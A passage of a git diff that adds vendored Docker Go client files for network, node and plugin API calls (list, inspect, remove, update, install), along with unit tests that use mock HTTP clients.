+} + +func TestNetworkInspect(t *testing.T) { + expectedURL := "/networks/network_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + + content, err := json.Marshal(types.NetworkResource{ + Name: "mynetwork", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.NetworkInspect(context.Background(), "network_id") + if err != nil { + t.Fatal(err) + } + if r.Name != "mynetwork" { + t.Fatalf("expected `mynetwork`, got %s", r.Name) + } +} diff --git a/vendor/github.com/docker/docker/client/network_list.go b/vendor/github.com/docker/docker/client/network_list.go new file mode 100644 index 0000000000..e566a93e23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_list.go @@ -0,0 +1,31 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// NetworkList returns the list of networks configured in the docker host. +func (cli *Client) NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error) { + query := url.Values{} + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + var networkResources []types.NetworkResource + resp, err := cli.get(ctx, "/networks", query, nil) + if err != nil { + return networkResources, err + } + err = json.NewDecoder(resp.body).Decode(&networkResources) + ensureReaderClosed(resp) + return networkResources, err +} diff --git a/vendor/github.com/docker/docker/client/network_list_test.go b/vendor/github.com/docker/docker/client/network_list_test.go new file mode 100644 index 0000000000..4d443496ac --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_list_test.go @@ -0,0 +1,108 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestNetworkListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NetworkList(context.Background(), types.NetworkListOptions{ + Filters: filters.NewArgs(), + }) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkList(t *testing.T) { + expectedURL := "/networks" + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + labelFilters := filters.NewArgs() + labelFilters.Add("label", "label1") + labelFilters.Add("label", "label2") + + listCases := []struct { + options types.NetworkListOptions + expectedFilters string + }{ + { + options: types.NetworkListOptions{ + Filters: filters.NewArgs(), + }, + expectedFilters: "", + }, { + options: types.NetworkListOptions{ + Filters: noDanglingFilters, + }, + expectedFilters: `{"dangling":{"false":true}}`, + }, { + options: types.NetworkListOptions{ + Filters: danglingFilters, + }, + expectedFilters: `{"dangling":{"true":true}}`, + }, { + options: types.NetworkListOptions{ + Filters: labelFilters, + }, + expectedFilters: `{"label":{"label1":true,"label2":true}}`, + }, + } + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + query := req.URL.Query() + actualFilters := query.Get("filters") + if actualFilters != listCase.expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters) + } + content, err := json.Marshal([]types.NetworkResource{ + { + Name: "network", + Driver: "bridge", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + networkResources, err := client.NetworkList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(networkResources) != 1 { + t.Fatalf("expected 1 network resource, got %v", networkResources) + } + } +} diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go new file mode 100644 index 0000000000..7352a7f0c5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// NetworksPrune requests the daemon to delete unused networks +func (cli *Client) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (types.NetworksPruneReport, error) { + var report types.NetworksPruneReport + + if err := cli.NewVersionError("1.25", "network prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/networks/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving network prune report: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go new file mode 100644 index 0000000000..6bd6748924 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// NetworkRemove removes an existent network from the docker host. +func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error { + resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go new file mode 100644 index 0000000000..2a7b9640c1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/network_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestNetworkRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NetworkRemove(context.Background(), "network_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNetworkRemove(t *testing.T) { + expectedURL := "/networks/network_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NetworkRemove(context.Background(), "network_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go new file mode 100644 index 0000000000..abf505d29c --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeInspectWithRaw returns the node information. +func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) { + serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Node{}, nil, nodeNotFoundError{nodeID} + } + return swarm.Node{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Node{}, nil, err + } + + var response swarm.Node + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go new file mode 100644 index 0000000000..fc13283084 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestNodeInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.NodeInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeInspectNodeNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.NodeInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNodeNotFound(err) { + t.Fatalf("expected an nodeNotFoundError error, got %v", err) + } +} + +func TestNodeInspect(t *testing.T) { + expectedURL := "/nodes/node_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Node{ + ID: "node_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + nodeInspect, _, err := client.NodeInspectWithRaw(context.Background(), "node_id") + if err != nil { + t.Fatal(err) + } + if nodeInspect.ID != "node_id" { + t.Fatalf("expected `node_id`, got %s", nodeInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go new file mode 100644 index 0000000000..3e8440f08e --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_list.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeList returns the list of nodes. +func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/nodes", query, nil) + if err != nil { + return nil, err + } + + var nodes []swarm.Node + err = json.NewDecoder(resp.body).Decode(&nodes) + ensureReaderClosed(resp) + return nodes, err +} diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go new file mode 100644 index 0000000000..0251b5cce4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestNodeListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.NodeList(context.Background(), types.NodeListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeList(t *testing.T) { + expectedURL := "/nodes" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.NodeListOptions + expectedQueryParams map[string]string + }{ + { + options: types.NodeListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.NodeListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Node{ + { + ID: "node_id1", + }, + { + ID: "node_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + nodes, err := client.NodeList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(nodes) != 2 { + t.Fatalf("expected 2 nodes, got %v", nodes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go new file mode 100644 index 0000000000..0a77f3d578 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_remove.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +// NodeRemove removes a Node. +func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go new file mode 100644 index 0000000000..f2f8adc4a3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_remove_test.go @@ -0,0 +1,69 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestNodeRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: false}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeRemove(t *testing.T) { + expectedURL := "/nodes/node_id" + + removeCases := []struct { + force bool + expectedForce string + }{ + { + expectedForce: "", + }, + { + force: true, + expectedForce: "1", + }, + } + + for _, removeCase := range removeCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + force := req.URL.Query().Get("force") + if force != removeCase.expectedForce { + return nil, fmt.Errorf("force not set in URL query properly. expected '%s', got %s", removeCase.expectedForce, force) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: removeCase.force}) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go new file mode 100644 index 0000000000..3ca9760282 --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_update.go @@ -0,0 +1,18 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// NodeUpdate updates a Node. +func (cli *Client) NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/nodes/"+nodeID+"/update", query, node, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go new file mode 100644 index 0000000000..613ff104eb --- /dev/null +++ b/vendor/github.com/docker/docker/client/node_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestNodeUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestNodeUpdate(t *testing.T) { + expectedURL := "/nodes/node_id/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go new file mode 100644 index 0000000000..22dcda24fd --- /dev/null +++ b/vendor/github.com/docker/docker/client/ping.go @@ -0,0 +1,30 @@ +package client + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers +func (cli *Client) Ping(ctx context.Context) (types.Ping, error) { + var ping types.Ping + req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil) + if err != nil { + return ping, err + } + serverResp, err := cli.doRequest(ctx, req) + if err != nil { + return ping, err + } + defer ensureReaderClosed(serverResp) + + ping.APIVersion = serverResp.header.Get("API-Version") + + if serverResp.header.Get("Docker-Experimental") == "true" { + ping.Experimental = true + } + + return ping, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go new file mode 100644 index 0000000000..a660ba5733 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_create.go @@ -0,0 +1,26 @@ +package client + +import ( + "io" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginCreate creates a plugin +func (cli *Client) PluginCreate(ctx context.Context, createContext io.Reader, createOptions types.PluginCreateOptions) error { + headers := http.Header(make(map[string][]string)) + headers.Set("Content-Type", "application/tar") + + query := url.Values{} + query.Set("name", createOptions.RepoName) + + resp, err := cli.postRaw(ctx, "/plugins/create", query, createContext, headers) + if err != nil { + return err + } + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go new file mode 100644 index 0000000000..30467db742 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_disable.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginDisable disables a plugin +func (cli *Client) PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error { + query := url.Values{} + if options.Force { + query.Set("force", "1") + } + resp, err := cli.post(ctx, "/plugins/"+name+"/disable", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go new file mode 100644 index 0000000000..a4de45be2d --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginDisableError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginDisable(t *testing.T) { + expectedURL := "/plugins/plugin_name/disable" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go new file mode 100644 index 0000000000..95517c4b80 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_enable.go @@ -0,0 +1,19 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginEnable enables a plugin +func (cli *Client) PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error { + query := url.Values{} + query.Set("timeout", strconv.Itoa(options.Timeout)) + + resp, err := cli.post(ctx, "/plugins/"+name+"/enable", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go new file mode 100644 index 0000000000..b27681348f --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go @@ -0,0 +1,48 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginEnableError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginEnable(t *testing.T) { + expectedURL := "/plugins/plugin_name/enable" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go new file mode 100644 index 0000000000..89f39ee2c6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_inspect.go @@ -0,0 +1,32 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginInspectWithRaw inspects an existing plugin +func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) { + resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return nil, nil, pluginNotFoundError{name} + } + return nil, nil, err + } + + defer ensureReaderClosed(resp) + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return nil, nil, err + } + var p types.Plugin + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&p) + return &p, body, err +} diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go new file mode 100644 index 0000000000..fae407eb9b --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.PluginInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestPluginInspect(t *testing.T) { + expectedURL := "/plugins/plugin_name" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.Plugin{ + ID: "plugin_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + pluginInspect, _, err := client.PluginInspectWithRaw(context.Background(), "plugin_name") + if err != nil { + t.Fatal(err) + } + if pluginInspect.ID != "plugin_id" { + t.Fatalf("expected `plugin_id`, got %s", pluginInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go new file mode 100644 index 0000000000..3217c4cf39 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_install.go @@ -0,0 +1,113 @@ +package client + +import ( + "encoding/json" + "io" + "net/http" + "net/url" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// PluginInstall installs a plugin +func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + query := url.Values{} + if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + return nil, errors.Wrap(err, "invalid remote reference") + } + query.Set("remote", options.RemoteRef) + + privileges, err := cli.checkPluginPermissions(ctx, query, options) + if err != nil { + return nil, err + } + + // set name for plugin pull, if empty should default to remote reference + query.Set("name", name) + + resp, err := cli.tryPluginPull(ctx, query, privileges, options.RegistryAuth) + if err != nil { + return nil, err + } + + name = resp.header.Get("Docker-Plugin-Name") + + pr, pw := io.Pipe() + go func() { // todo: the client should probably be designed more around the actual api + _, err := io.Copy(pw, resp.body) + if err != nil { + pw.CloseWithError(err) + return + } + defer func() { + if err != nil { + delResp, _ := cli.delete(ctx, "/plugins/"+name, nil, nil) + ensureReaderClosed(delResp) + } + }() + if len(options.Args) > 0 { + if err := cli.PluginSet(ctx, name, options.Args); err != nil { + pw.CloseWithError(err) + return + } + } + + if options.Disabled { + pw.Close() + return + } + + err = cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0}) + pw.CloseWithError(err) + }() + return pr, nil +} + +func (cli *Client) tryPluginPrivileges(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.get(ctx, "/plugins/privileges", query, headers) +} + +func (cli *Client) tryPluginPull(ctx context.Context, query url.Values, privileges types.PluginPrivileges, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/plugins/pull", query, privileges, headers) +} + +func (cli *Client) checkPluginPermissions(ctx context.Context, query url.Values, options types.PluginInstallOptions) (types.PluginPrivileges, error) { + resp, err := cli.tryPluginPrivileges(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + // todo: do inspect before to check existing name before checking privileges + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + ensureReaderClosed(resp) + return nil, privilegeErr + } + options.RegistryAuth = newAuthHeader + resp, err = cli.tryPluginPrivileges(ctx, query, options.RegistryAuth) + } + if err != nil { + ensureReaderClosed(resp) + return nil, err + } + + var privileges types.PluginPrivileges + if err := json.NewDecoder(resp.body).Decode(&privileges); err != nil { + ensureReaderClosed(resp) + return nil, err + } + ensureReaderClosed(resp) + + if !options.AcceptAllPermissions && options.AcceptPermissionsFunc != nil && len(privileges) > 0 { + accept, err := options.AcceptPermissionsFunc(privileges) + if err != nil { + return nil, err + } + if !accept { + return nil, pluginPermissionDenied{options.RemoteRef} + } + } + return privileges, nil +} diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go new file mode 100644 index 0000000000..88c480a3e1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_list.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// PluginList returns the installed plugins +func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) { + var plugins types.PluginsListResponse + resp, err := cli.get(ctx, "/plugins", nil, nil) + if err != nil { + return plugins, err + } + + err = json.NewDecoder(resp.body).Decode(&plugins) + ensureReaderClosed(resp) + return plugins, err +} diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go new file mode 100644 index 0000000000..173e4b87f5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/plugin_list_test.go @@ -0,0 +1,59 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestPluginListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.PluginList(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + 